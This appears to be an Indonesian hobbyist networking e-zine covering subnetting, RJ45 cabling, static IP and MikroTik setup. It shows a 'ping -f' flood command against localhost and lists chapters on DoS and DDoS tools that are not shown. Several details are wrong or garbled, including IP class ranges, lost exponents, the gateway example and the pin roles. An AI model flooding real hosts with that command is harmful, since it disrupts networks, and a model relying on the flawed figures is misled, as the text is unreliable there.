Puji syukur kami panjatkan ke hadirat Tuhan YME karena kasih setia dan pertolonganNya hingga kami dapat menyelesaikan buku ini walaupun agak lama jarak terbitnya dari e-ZIT Vol pertama.
Di e-ZIT Vol 2 ini kami membahas mengenai Networking dan apa saja yang terkait di dalamnya, mulai dari langkah-langkah awal untuk menjadi seorang networker, basic networking dan beberapa tips n tricks yang juga masih di seputar dunia netrworking.
Semoga di e-ZIT Vol 2 ini dapat membantu, dan menambah pengetahuan teman-teman mengenai dunia Netwroking. Dan kami mohon maaf apabila terdapat banyak kekurangan di e-ZIT vol 2 ini.
Semua yang tercantum di dalam e-ZIT ini adalah hasil experiment, searching di internet dan Thread di forum codernate.
Akhir kata, kami sampaikan terimakasih kepada semua pihak yang telah berperan dalam penyusunan e-ZIT ini dari awal sampai akhir.
Selamat membaca…
Salam
Team Readksi & All Staff Zona IT Ternate
2. e-ZIT #Vol 2 - Networking 2
Introduce
History
ZONA IT TERNATE atau di singkat dengan ZIT, berdiri pada tanggal 18 Februari 2012 adalah suatu komunitas yang peduli akan perkembangan ilmu pengetahuan teknologi yang di buka secara umum baik untuk mahasiswa, pelajar maupun masyaratakat umum lainya, guna mengembangkan ilmu teknologi dan informasi dan sebagai media perkumpulan sesama pecinta IT.
Visi
“Menjadi komunitas yang komunikatif, informatif, kreatif, humanis dan berkualitas di tingkat Provinsi dan Nasional “
Misi
Menciptakan, menerapkan dan mengembangkan teknologi informasi yang berdaya guna dan berhasil guna bagi masyarakat.
Mendayakan tiap komponen yang ada untuk menguasai ilmu pengetahuan dan teknologi untuk memberikan yang terbaik bagi perkembangannya.
Mewujudkan sebuah wahana pengembangan ilmu pengetahuan dan teknologi diluar naungan kampus maupun sekolah
Menbentuk Keluarga Besar Pecinta IT Khususnya di Ternate dan Maluku Utara pada umumnya.
Menciptakan Komunitas yang memiliki jiwa kewirausahaan dan Berdaya saing
Motto
Learn, Explore, Action, Share
3. e-ZIT #Vol 2 - Networking 3
Kata Pengantar
Puji syukur kami panjatkan ke hadirat Tuhan YME karena kasih setia dan pertolonganNya hingga kami dapat menyelesaikan buku ini walaupun agak lama jarak terbitnya dari e-ZIT Vol pertama.
Di e-ZIT Vol 2 ini kami membahas mengenai Networking dan apa saja yang terkait di dalamnya, mulai dari langkah-langkah awal untuk menjadi seorang networker, basic networking dan beberapa tips n tricks yang juga masih di seputar dunia netrworking.
Semoga di e-ZIT Vol 2 ini dapat membantu, dan menambah pengetahuan teman-teman mengenai dunia Netwroking. Dan kami mohon maaf apabila terdapat banyak kekurangan di e-ZIT vol 2 ini.
Semua yang tercantum di dalam e-ZIT ini adalah hasil experiment, searching di internet dan Thread di forum codernate.
Akhir kata, kami sampaikan terimakasih kepada semua pihak yang telah berperan dalam penyusunan e-ZIT ini dari awal sampai akhir.
Selamat membaca…
Salam
Team Readksi & All Staff Zona IT Ternate
4. e-ZIT #Vol 2 - Networking 4
Index
Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus Saya Pelajari ? #5
Cara Cepat Mengitung IP Address & Subnetting #7
Cara Konfigurasi RJ45 [Pengkabelan] #12
Setting IP Static di Backtrack/Ubuntu #17
Beragam Tips Perintah Ping #20
Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address dan NAT #22
Mikrotik > Management Bandwith Berdasarkan Extensi #24
Mikrotik > Cara Sederhana Membuat Hotspot #32
Mikrotik > Pisah Download, Browse & Game di 1 Line #33
Mikrotik > Leases Static DHCP #36
Network Scanning With NMAP #37
Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G #40
Security > Mencegah Serangan Ping Flooding Dengan Iptables #46
Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip #48
Security > Apa Itu Honeypot ? #50
Network Attack > DoS Attack With Metasploit #57
Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack #62
Network Attack > How To Use Xerxes DDoS Tools #65
ZIT Product & Info #67
- Codernate Linux 1.4 (Dodorobe) Released!!!
Credits #69
- Cara Kirim Artikel Di e-ZIT edisi berikutnya
- Redaksi
- Grets
Home Page #70
5. e-ZIT #Vol 2 - Networking 5
Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus Saya Pelajari ?
Yups, akhirnya setelah 2 bulan vacum, ketemu lagi deh sama e-ZIT Vol 2, hehehe
Nah, karena di Vol 2 temanya mengenai Networking, kali ini e-ZIT mau berbagi sedikit tips seputar Kaka-kaka yang pengen menggeluti dunia Networking,, iya Networking, iya bener, #halah okeh lanjut..
Bagi kaka-kaka yang bercita-cita menjadi seorang SysAdmin a.k.a Networker atau pengen mengenal lebih dalam, lebih dekat, lebih, jauh dan lebih-lebih lainnya mengenai dunia Networking, pasti akan berpikir, kira-kira Saya harus mulai dari mana dulu yah ? atau mungkin bertanya-tanya, apa yang harus Saya pelajari duluan yah? Dan masih banyak pertanyaan-pertanyaan lainnya..
Nah disini e-ZIT mau bagi sedikit tips neh, yang telah e-ZIT rangkum dari hasil wawancara dengan teman-teman ZIT, googling dan maen-maen di forum tetangga,,, hehehe
Yups, tho the point saja,,, neh :
1. Basic IP dan Subnetting
Mungkin kalau bisa dibilang yang sangat penting dari semua-nya adalah IP dan subnetting. Hal ini akan sangat terasa apabila Anda bekerja di ISP. Anda akan mempelajari cara efisiensi IP,apa itu gateway? Bagaimana mengatur IP yang baik, dll
2. Basic Hardware Networking
Kenapa mesti dipelajari?? Karena dari sinilah inti perjalanan packet yang akan dikirim dari komputer kita ke Server. Apa itu Switch, Hub, Wireless. Taukah Anda bahwa switch lebih aman daripada WIFI?? Kapan saya menggunakan switch atau Wifi. Semua harus diperhitungkan dengan baik. Darimana kita belajar? Banyak buku yang mempelajari hal tersebut
3. Technology Switching dan Routing
Kalau Anda sudah melebihi 1 jaringan di kantor Anda harus bisa melakukan routing terhadap jaringan. Tau tidak bahwa internet bisa terhubung ke mana-mana karena routing ini. Untuk switching Anda perlu mempelajari Teknologi VLAN dll.
4. Linux
Loh, loh, loh, linux lagi, linux lagi, kenapa mesti linux ? kenapa nggak windows saja ?
6. e-ZIT #Vol 2 - Networking 6
Hahaha, yah begitulah, disamping Linux lebih stabil untuk Networking, kebanyakan OS server-server yang di pakai sekarang yah Linux, karena Linux emang cocok untuk Networking, lebih aman dari windows juga dan masih banyak manfaat dan kelebihan Linux untuk keperluan lainnya, bisa di bilang anak Networking, seorang SysAdmin atau Networker itu harus familiar sama OS yang satu ini…
5. Technology Server
Kalau yang satu ini Anda akan banyak berhubungan dengan Server LDAP, DHCP, DNS, Dll. Intinya adalah memberikan service yang dibutuhkan untuk client. Untuk mencari informasi silahkan minta bantuan Google. Ketikkan service server yang ingin dipelajari
6. Security
Nah setelah terbentuk server dan infrastruktur yang baik barulah Anda memperhatikan Security mulai dari Server, Router, sampai Anda membuat IDS untuk mendeteksi serangan
7. Monitoring
Monitoring ini mencangkup semua hal baik dari infrastruktur maupun dari sisi Server. Semakin baik monitoring maka Anda akan mudah..
8. Backup
Hal ini sering dilupakan oleh para Network Administrator. Lakukan Backup Deferensial maupun Full untuk mengantisipasi Crash. Banyak teknologi yang dilakukan. Kalau saya lebih sering menggunakan RAID untuk Backup Harddisk dan Rsync untuk FIle
Darimana Kaka bisa mempelajari hal-hal tersebut:
1. Dari Google yang pasti nya
2. Buku atau Ebook
3. Tutorial
4. Forum
5. Pengalaman dan TroubleShooting terhadap suatu masalah
Yarp, mungkin itu saja sedikit tips yang bias e-ZIT berikan di kesempatan kali ini, apabila teman-teman punya saran yang lainnya jangan lupa di share juga yah
./regards
e-ZIT
7. e-ZIT #Vol 2 - Networking 7
Cara Cepat Mengitung IP Address & Subnetting
IP Address merupakan alat yang digunakan agar paket data dapat mencapai tujuan. Di dalam Jaringan, pengiriman suatu paket data membutuhkan alamat sebagai identitas suatu
Data akan dikirimkan (Destination Address) dan berasal (Source Address).
Agar unik setiap computer yang terkoneksi ke Internet diberi alamat yang berbeda. Alamat ini supaya seragam seluruh dunia maka pemberian alamat IP address diseluruh dunia diberikan oleh badan internasional Internet Assigned Number Authority (IANA), dimana IANA hanya memberikan IP address Network ID nya saja sedangkan host ID diatur oleh pemilik IP address tersebut. Contoh IP address untuk cisco.com adalah 202.93.35.9 untuk http://www.ilkom.unsri.ac.id dengan IP nya 202.39.35.9
http://www.freeimagehosting.net/nptte Ip address dibagi menjadi 2 bagian yaitu Network ID dan Host ID, Network ID yang akan menentukan alamat dalam jaringan (network address), sedangkan Host ID menentukan alamat dari peralatan jaringan yang sifatnya unik untuk membedakan antara satu mesin dengan mesin lainnya. Ibaratkan Network ID Nomor jalan dan alamat jalan sedangkan Host ID adalah nomor rumahnya.
IP address dibagi menjadi kelas yaitu ;
1. Kelas A ( 1-126) 2. Kelas B ( 128 – 192) 3. Kelas C ( 192 – 223) 4. Kelas D (224 – 239) 5. Kelas E (240 – 255)
IP Address Private & Public
Jumlah IP Address sangat terbatas, apalagi jika harus memberikan alamat semua host di Jaringan Local Area Network (LAN). Sehingga perlu dilakukan efisiensi dalam penggunaan IP Address. Konsep subnetting IP Address merupakan teknik yang umum digunakan di Jaringan Internet untuk efisiensi alokasi IP Address dalam sebuah jaringan. Selain Konsep Subnetting, cara lain adalah dengan mengalokasikan beberapa IP Address khusus yang digunakan untuk lingkungan LAN dikenal dengan IP Private. Sedangkan IP Address yang dapat dikenal di Internet dikenal dengan IP Public.
IP Private antara lain adalah : ß Class A: 10.0.0.0/8 ß Class B: 172.16.0.0/16 s/d 172.31.0.0/15 ß Class C: 192.168.0.0/24 s/d 192.168.255.0/24
8. e-ZIT #Vol 2 - Networking 8
Penghitungan Subnetting
Pada hakekatnya semua pertanyaan tentang subnetting akan berkisar di empat masalah: Jumlah Subnet, Jumlah Host per Subnet, Blok Subnet, dan Alamat Host- Broadcast. Penulisan IP address umumnya adalah dengan 192.168.1.2. Namun adakalanya ditulis dengan 192.168.1.2/24, apa ini artinya? Artinya bahwa IP address 192.168.1.2 dengan subnet mask 255.255.255.0. Lho kok bisa seperti itu? Ya, /24 diambil dari penghitungan bahwa 24 bit subnet mask diselubung dengan binari 1. Atau dengan kata lain, subnet masknya adalah: 11111111.11111111.11111111.00000000 (255.255.255.0). Konsep ini yang disebut dengan CIDR (Classless Inter-Domain Routing) yang diperkenalkan pertama kali tahun 1992 oleh IEFT.
http://www.freeimagehosting.net/tovgc
SUBNETTING PADA IP ADDRESS CLASS C
Ok, sekarang mari langsung latihan saja. Subnetting seperti apa yang terjadi dengan sebuah
NETWORK ADDRESS 192.168.1.0/26 ?
Analisa: 192.168.1.0 berarti kelas C dengan Subnet Mask /26 berarti
11111111.11111111.11111111.11000000 (255.255.255.192).
Penghitungan: Seperti sudah saya sebutkan sebelumnya semua pertanyaan tentang subnetting akan berpusat di 4 hal, jumlah subnet, jumlah host per subnet, blok subnet, alamat host dan broadcast yang valid. Jadi kita selesaikan dengan urutan seperti itu:
1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada oktet terakhir subnet mask (2 oktet terakhir untuk kelas B, dan 3 oktet terakhir untuk kelas A). Jadi Jumlah Subnet adalah 22 = 4 subnet
2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada oktet terakhir subnet. Jadi jumlah host per subnet adalah 26 - 2 = 62 host
3. Blok Subnet = 256 - 192 (nilai oktet terakhir subnet mask) = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.
4. Bagaimana dengan alamat host dan broadcast yang valid? Kita langsung buat tabelnya. Sebagai catatan, host pertama adalah 1 angka setelah subnet, dan broadcast adalah 1 angka sebelum subnet berikutnya.
http://www.freeimagehosting.net/jgix4
9. e-ZIT #Vol 2 - Networking 9
SUBNETTING PADA IP ADDRESS CLASS B
Berikutnya kita akan mencoba melakukan subnetting untuk IP address class B. Pertama, subnet mask yang bisa digunakan untuk subnetting class B adalah seperti dibawah. Sengaja saya pisahkan jadi dua, blok sebelah kiri dan kanan karena masing-masing berbeda teknik terutama untuk oktet yang “dimainkan” berdasarkan blok subnetnya. CIDR /17 sampai /24 caranya sama persis dengan subnetting Class C, hanya blok subnetnya kita masukkan langsung ke oktet ketiga, bukan seperti Class C yang “dimainkan” di oktet keempat. Sedangkan CIDR /25 sampai /30 (kelipatan) blok subnet kita “mainkan” di oktet keempat, tapi setelah selesai oktet ketiga berjalan maju (coeunter) dari 0, 1, 2, 3, dst.
http://www.freeimagehosting.net/wyove
Ok, kita coba dua soal untuk kedua teknik subnetting untuk Class B. Kita mulai dari yang menggunakan subnetmask dengan CIDR /17 sampai /24. Contoh network address 172.16.0.0/18. Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /18 berarti 11111111.11111111.11000000.00000000 (255.255.192.0). Penghitungan:
1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada 2 oktet terakhir. Jadi Jumlah Subnet adalah 22 = 4 subnet
2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada 2 oktet terakhir. Jadi jumlah host per subnet adalah 214 - 2 = 16.382 host
3. Blok Subnet = 256 - 192 = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/t12dy
Berikutnya kita coba satu lagi untuk Class B khususnya untuk yang menggunakan subnetmask CIDR /25 sampai /30. Contoh network address 172.16.0.0/25. Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /25 berarti
11111111.11111111.11111111.10000000 (255.255.255.128).
Penghitungan:
1. Jumlah Subnet = 29 = 512 subnet
2. Jumlah Host per Subnet = 27 - 2 = 126 host
3. Blok Subnet = 256 - 128 = 128. Jadi lengkapnya adalah (0, 128)
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/sa19j
10. e-ZIT #Vol 2 - Networking 10
SUBNETTING PADA IP ADDRESS CLASS A
Kalau sudah mantab dan paham, kita lanjut ke Class A. Konsepnya semua sama saja. Perbedaannya adalah di OKTET mana kita mainkan blok subnet. Kalau Class C di oktet ke 4 (terakhir), kelas B di Oktet 3 dan 4 (2 oktet terakhir), kalau Class A di oktet 2, 3 dan 4 (3 oktet terakhir). Kemudian subnet mask yang bisa digunakan untuk subnetting class A adalah semua subnet mask dari CIDR /8 sampai /30.
Kita coba latihan untuk network address 10.0.0.0/16.
Analisa: 10.0.0.0 berarti kelas A, dengan Subnet Mask /16 berarti
11111111.11111111.00000000.00000000 (255.255.0.0).
Penghitungan:
1. Jumlah Subnet = 28 = 256 subnet
2. Jumlah Host per Subnet = 216 - 2 = 65534 host
3. Blok Subnet = 256 - 255 = 1. Jadi subnet lengkapnya: 0,1,2,3,4, etc.
4. Alamat host dan broadcast yang valid?
http://www.freeimagehosting.net/c6pj3 Catatan: Semua penghitungan subnet diatas berasumsikan bahwa IP Subnet-Zeroes (dan IP Subnet-Ones) dihitung secara default. Buku versi terbaru Todd Lamle dan juga CCNA setelah 2005 sudah mengakomodasi masalah IP Subnet-Zeroes (dan IP Subnet-Ones) ini. CCNA pre- 2005 tidak memasukkannya secara default (meskipun di kenyataan kita bisa mengaktifkannya dengan command ip subnet-zeroes), sehingga mungkin dalam beberapa buku tentang CCNA serta soal-soal test CNAP, anda masih menemukan rumus penghitungan Jumlah Subnet = 2x – 2
Tujuan Subnetting:
ß Menghemat penggunaan IP Public.
ß Mengurangi tingkat kongesti (kemacetan) komunikasi data didalam Jaringan.
ß Mengatasi perbedaan hardware dan media fisik yang digunakan dalam suatu network.
ß Memecah Broadcast Domain.
Proses subnetting adalah “memindahkan” atau menggeser garis pemisah antara bagian network dan bagian host darisuatu IP Address.
11. e-ZIT #Vol 2 - Networking 11
Beberapa bit dari bagian host-ID dialokasikan menjadi bit tambahan pada bagian network-
ID. Network Address pada satu Jaringan Tunggal dipecah menjadi beberapa subnetwork.
Proses Subnetting dapat membuat sejumlah network tambahan dengan mengurangi jumlah maksimum host yang ada dalam tiap network tersebut.....
Semoga bermanfaat ya..... :)
ket : tabel subnetting >> http://4.bp.blogspot.com/_rQYEfq496fE/TM...ting_c.png
special thank : http://bakirmuhammad2711.blogspot.com/ ./regards shockw4v3
12. e-ZIT #Vol 2 - Networking 12
Cara Konfigurasi RJ45 [Pengkabelan]
Assalamuallaikum wr...wb
Hallo sahabatku. Ini mungkin artikel pertama saya di forum.codernate.org. basic sih, tapi apa salahnya di share… wkwkwk
Nah kali ini saya akan share tentang cara konfigurasi kabel RJ 45. Sedikit cerita tentang pengalaman saya, ceritanya waktu itu lagi dapat tugas kampus. Tugasnya tentang cara membuat dan mengenali kabel RJ45 tersebut, dan saya yang notabenenya masih newbie didunia IT, masih kebingungan membedakan susunan alias cara konfigurasi kabel tersebut.. OK ini OOT..
Sedikit penjelasan, Berdasarkan media transmisi, dalam jaringan terbagi menjadi 2, yaitu:
Jaringan berkabel ( wired Network )
Jaringan Nirkabel ( wirelles Network )
Dan menurut pengalaman dan yang saya tau, dalam media transmisi jaringan dalam hal ini pada kabelnya, ada terdapat 3 buah kabel sebgai medianya, yaitu:
1. Fiber optik ( FO )
2. Coaxial
3. RJ45
Tentunya para sahabat” yang sudah berkecimpung di dunia IT sudah pada paham kan tentang Transmisi yang saya sisipkan di atas dan pengertianya serta perkembangannya,,, Ok langsung saja kita kembali ke topik permasalahan yaitu dimana kita akan membahas tentang RJ 45. Yang saya mau bahas kali ini mengenai kabel RJ 45 sedikit gambaran tentang pemahaman kabel RJ 45 tersebut yaitu memiliki 8 pin dan ke delapan pin tersebut sudah mempunyai tugas tersendiri yang di rinci atau di bagi 2 yaitu empat nya untuk data dan empatnya lagi untuk daya, antara lain yaitu :
1236 > Untuk Data 4578 > Untuk Daya
13. e-ZIT #Vol 2 - Networking 13
Nah masih bingung ya,,ok langsung saja pada poin di bawah ini...!!! #Stright
Susunan Stright Titik A Titik B Putih orange > Putih orange Orange > Orange Putih hijau > Putih hijau Biru > Biru Putih biru > Putih biru Hijau > Hijau Putih coklat > Putih coklat Coklat > Coklat
Nah seperti yang teman-teman lihat pada gambar di atas, susunan kabel pada pin yang tertancap di konektor sudah sesuai dengan warna-warna yang telah ditetapkan tadi. Nah tipe diatas ialah tipe straight, dimana susunan warna kabel pada titik A dan titik B tetap sama posisi dan letaknya. hehehhee masih bingung ya...!!!
14. e-ZIT #Vol 2 - Networking 14
Ok saya akan contohkan seperti gambar berikut ini
Semoga pada tahap ini sobat sudah mulai paham…
15. e-ZIT #Vol 2 - Networking 15
#Cross
Susunan Cross Titik A Titik B Putih orange > Putih Hijau Orange > Hijau Putih hijau > Putih Orange Biru > Biru Putih biru > Putih biru Hijau > Orange Putih coklat > Putih coklat Coklat > Coklat
Nah ini nih yang mereka sebut susunan cross, dimana susunan warna kabel pada Titik A dan Titik B sudah berbeda satu sama lain, dan bagian yang diwarnai itu [Titik B] adalah pada ujung kabel yang satunya, jika pada stright, susunan warna kedua kabel sama posisinya, nah pada cross ujung yang satunya seperti stright sedangkan yang satunya lagi susunannya seperti keterangan diatas.. kira-kira begitu cara konfigurasi susunan kabel RJ45 yang saya ketahui.
16. e-ZIT #Vol 2 - Networking 16
Sekian. mungkin itu saja sedikit pengalaman saya tentang konfigurasi RJ45. Maaf jika masih terdapat banyak kekurangan atau kesalahan pada artikel saya…
Wasallam. Thank’s buat yang sudah baca atau ikut petunjuk saya,,,!!!
./Regards
Surtua
17. e-ZIT #Vol 2 - Networking 17
Setting IP Static di Backtrack/Ubuntu
Salam Backtrackers Bifi Ada Lagi, kali ini ane mw share cara setting ip static di backtrack/ubuntu.. letz rock Cara Pertama Open Terminal Lalu Ketik comand ini
Code:
nano /etc/network/interfaces
Nah setelah nano editor terbuka maka akan muncul kayak gini
Code:
auto lo iface lo inet loopback ------------------------------------- auto eth0 iface eth0 inet dhcp address network < edit di bagian ini broadcast netmask gateway ------------------------------------- auto ath0 iface ath0 inet dhcp auto wlan0 iface wlan0 inet dhcp
disitu ada beberapa interfaces seperti eth1,eth2,eth0 dll lalu cari interface eth0 kemudian ganti iface eth0 inet dhcp menjadi static masukan address, network, broadcast, netmask n gateway contoh aja
Code:
auto eth0 iface eth0 inet static address 10.20.30.2 network 10.20.30.0 broadcast 10.20.30.7 netmask 255.255.255.248 gateway 10.20.30.2
18. e-ZIT #Vol 2 - Networking 18
setelah itu di ctrl+x untuk save.. Jangan lupa setting dnsnya di sini
Code:
nano /etc/resolv.conf
ntar di nano editornya ketik saja dns kali ini ane make mbah gugel kayak gini
Code:
nameserver 8.8.8.8 nameserver 8.8.4.4
19. e-ZIT #Vol 2 - Networking 19
Cara Kedua Masih Di Terminal ketik comand berikut secara bertahap
Code:
root@bt~# ifconfig eth0 10.20.30.2/24 root@bt~# route add default gw 10.20.30.2 root@bt~# echo nameserver 8.8.8.8 > /etc/resolv.conf
Lalu restart interfacenya
Code:
/etc/init.d/networking restart
nah kalo udah di restart networknya ketik ifconfig untuk mngecek apakah ipnya berubah seperti yang di setting tadi ataw tidak... Kalo Belum berubah, silahkan di ulangi langkah di atas.... nb : ketik saja comand berikut
Code:
update-rc.d networking defaults
agar settingannya dapat terload ketika terestart... setelah itu restart backtrack anda.. untuk lebih detail tentang apa itu address, network, broadcast, netmask n gateway, silahkan tnya di gugel.... YUps, sekian tutor saya menganai setting ip static di backtrack/ubuntu... next time ane share lagi tentang cara buat DNS Server... Referensi > http://www.google.com
./regards
Bifi
20. e-ZIT #Vol 2 - Networking 20
Beragam Tips Perintah Ping
Baris perintah ini sangat penting untuk kita gunakan. Apalagi jika menyangkut dengan komunikasi antar jaringan,, ya inilah baris perintah ping. “Ping merupakan salah satu program yang digunakan untuk mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP”. ping akan mengirimkan internet control message protocol (ICMP) Echo Request messages pada IP address komputer yang di tuju dan meminta respon dari komputer tersebut. Jika komputer target memberikan respon, komputer tersebut memberikan informasi seperti contoh hasil ping report dibawah ini :
Beragam Tips Perintah Ping : 1. Menambah/mengurangi interval waktu antara paket. Secara default, ping menunggu 1 detik sebelum mengirim paket berikutnya. denagan opsi -i, anda dapat menambah atau mengurangi interval tersebut contoh : tungu 5 detik sebelum mengirim paket berikutnya dan tunggu 0,1 detik sebelum mengirim paket berikutnya.
Code:
#ping -i 5 192.168.0.28 #ping -i 0.1 192.168.0.28
2. Periksa antarmuka jaringan lokal : Up dan Running. Sebelum memesiksa apakah mesin peer terjangkau, cek dahulu apakah jaringan lokal adalah Up dan Running menggunakan salah satu dari tiga metode berikut : Ping localhost menggunakan nol (0), nama, dan IP address.
Code:
#ping 0 #ping localhost #ping 127.0.0.1
3. Mengirim paket N dan STOP Mengirim paket N ditentukan dengan opsi -c dan kemudian stop atau keluar secara otomatis (tanpa harus menekan CTRL+C untuk keluar). contoh : perintah ping mengirim 5 paketdan menunggu respon dari host tujuan. anda juga dapat mengunakan opsi -w untuk menspesifikasikan batas waktu mengirim output ping.
Code:
#ping -c google.com #ping -w 5 google.com
21. e-ZIT #Vol 2 - Networking 21
4. Flood the Network Superuser dapat mengirim seratusatau lebih paket per detik menggunakan opsi -f. ini mencetak'.' ketika sebuah paket dikirimkan. contoh : ping -f telah mengirimkan lebih dari 400.000 paket dalam beberapa detik.
Code:
#ping -f localhost PING localhost.localadmin (127.0.0.1) 56(84) bytes of data. .^C 427412 packets transmitted, 427412 received,
ada yang mau tambahin perintah lain pada ping...
silahkan
spesial thanks : http://www.gudasi.com/
./regards
shockw4v3
22. e-ZIT #Vol 2 - Networking 22
Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address dan NAT
Akses mikrotik: 1. via console Mikrotik router board ataupun PC dapat diakses langsung via console/ shell maupun remote akses menggunakan putty. 2. via winbox Mikrotik bisa juga diakses/remote menggunakan software tool winbox. 3. via web Mikrotik juga dapat diakses via web/port 80 dengan menggunakan browser. Memberi Nama Mikrotik
Code:
[admin@Feenx_O] > system identity print name: "Mikrotik" [ropix@Feenx_O] > system identity edit value-name: name masuk ke editor ketik misal saya ganti dengan nama Feenx_O: Feenx_O C-c quit C-o save&quit C-u undo C-k cut line C-y paste Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
Mengganti Nama Interface
Code:
[admin@Feenx_O] > /interface print Flags: X - disabled, D - dynamic, R - running # NAME TYPE RX-RATE TX-RATE MTU 0 R ether1 ether 0 0 1500 1 R ether2 ether 0 0 1500 [admin@Feenx_O] > /interface edit 0 value-name: name Nilai 0 adalah nilai ether1, jika ingin mengganti ethet2 nilai 0 diganti dengan 1. masuk ke editor ketik missal saya ganti dengan nama LAN: LAN C-c quit C-o save&quit C-u undo C-k cut line C-y paste Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor
23. e-ZIT #Vol 2 - Networking 23
Lakukan hal yang sama untuk interface ether 2, sehingga jika dilihat lagi akan muncul seperti ini:
[admin@Feenx_O] > /interface print Flags: X - disabled, D - dynamic, R - running # NAME TYPE RX-RATE TX-RATE MTU 0 R LAN ether 0 0 1500 1 R Hotspot ether 0 0 1500
setting ip address
Code:
[admin@Feenx_O] > /ip address add address: 192.168.1.1/24 interface: LAN [admin@Feenx_O] > /ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK BROADCAST INTERFACE 0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN
Masukkan IP addres value pada kolom address beserta netmask, masukkan nama interface yg ingin diberikan ip addressnya.Untuk Interface ke-2 yaitu interface hotspot, caranya sama dengan diatas, sehingga jika dilihat lagi akan menjadi 2 interface: [admin@Feenx_O] > /ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK BROADCAST INTERFACE 0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN 1 202.51.192.42/29 202.51.192.40 202.51.192.47 Hotspot
NAT
Code:
[admin@Feenx_O] > /ip firewall nat add chain=srcnat action=masquerade out- interface=LAN
Catatan : dalam tutorial ini... saya mengakses mikrotik menggunakan winbox, dan membuat settingan didalam mikrotik menggunakan fitur "new terminal" yang ada didalam winbox.
./regards
Feenx_O
24. e-ZIT #Vol 2 - Networking 24
Mikrotik > Management Bandwith Berdasarkan Extensi
Ok waktunya ber experiment. Disini kita mencoba melimit bandwith berdasarkan extensi
Ok langsung saja, sory kalau tulisannya rada kacau
1. buat layer7 nya, sedikit tentang layer 7 ( layer aplication) Layer Application adalah penghubung utama antara aplikasi yang berjalan pada satu komputer dan resources network yang membutuhkan akses padanya. Layer Application adalah layer dimana user akan beroperasi padanya, protocol seperti FTP, telnet, SMTP, HTTP, POP3 berada pada layer Application untuk pengaplikasiannya, pastekan sript dibawah ini ke terminal mikrotik :
Code: /ip firewall layer7-protocol add name=http-video regexp="http/(0.9|1.0|1.1)[x09-x0d ][1-5][0-9][0-9][x09-x0d - ~]*(content-type: video) /ip firewall layer7-protocol add comment="" name="Extension " .exe "" regexp=".(exe)" /ip firewall layer7-protocol add comment="" name="Extension " .rar "" regexp=".(rar)" /ip firewall layer7-protocol add comment="" name="Extension " .zip "" regexp=".(zip)" /ip firewall layer7-protocol add comment="" name="Extension " .7z "" regexp=".(7z)" /ip firewall layer7-protocol add comment="" name="Extension " .cab "" regexp=".(cab)" /ip firewall layer7-protocol add comment="" name="Extension " .asf "" regexp=".(asf)" /ip firewall layer7-protocol add comment="" name="Extension " .mov "" regexp=".(mov)" /ip firewall layer7-protocol add comment="" name="Extension " .wmv "" regexp=".(wmv)" /ip firewall layer7-protocol add comment="" name="Extension " .mpg "" regexp=".(mpg)" /ip firewall layer7-protocol add comment="" name="Extension " .mpeg "" regexp=".(mpeg)" /ip firewall layer7-protocol add comment="" name="Extension " .mkv "" regexp=".(mkv)" /ip firewall layer7-protocol add comment="" name="Extension " .avi "" regexp=".(avi)" /ip firewall layer7-protocol add comment="" name="Extension " .flv "" regexp=".(flv)" /ip firewall layer7-protocol add comment="" name="Extension " .wav "" regexp=".(wav)" /ip firewall layer7-protocol add comment="" name="Extension " .rm "" regexp=".(rm)"
31. e-ZIT #Vol 2 - Networking 31
sory kalau configurasinya bukan dari awal configurasi, disini saya menganggap anda telah sukses mengkonfigurasi mikrotiknya hingga terkoneksi :peace: :peace: ket : experiment ini sangat cocok buat warnet dgn bandwidth kecil atau terbatas (contoh kasus : warnet saya dulu) (khusus indonesia bagian timur yang harga bandwitdh mahal)
./regards
shockw4v3
32. e-ZIT #Vol 2 - Networking 32
Mikrotik > Cara Sederhana Membuat Hotspot
I'm comeback again...!!! tanpa banyak basa basi lagi... mari kita lihat gimana caranya mengconfigurasi mikrotik untuk membuat jaringan hotspot... cekidot :dance: beri ip masing-masing LAN CARD!!
Code:
[admin@Mikrotik] > ip address add address=192.168.0.2/30 interface=UpLink [admin@Mikrotik] > ip address add address=192.168.1.1/24 interface=Lokal [admin@Mikrotik] > ip address add address=192.168.2.1/24 interface=HotSpot
interface=HotSpot ini adalah koneksi ke wireless (wifi) kita Masukkan default routenya
Code:
[admin@MikroTik] > ip route add gateway 192.168.0.1
Kemudian Setting HotSpotnya
Code:
[admin@MikroTik] > ip hotspot setup hotspot interface: HotSpot local address of network: 192.168.2.1/24 masquerade network: yes address pool of network: 192.168.2.2-192.168.2.99 select certificate: none ip address of smtp server: 0.0.0.0 dns servers: 192.168.2.1 dns name: hotspot.com name of local hotspot user: user password for the user: ****password*** (user & password ganti terserah kita)
ok! sampai disini... settingan hotspot telah berhasil dilakukan dan siap dipakai....
./regards
Feenx_O
33. e-ZIT #Vol 2 - Networking 33
Mikrotik > Pisah Download, Browse & Game di 1 Line
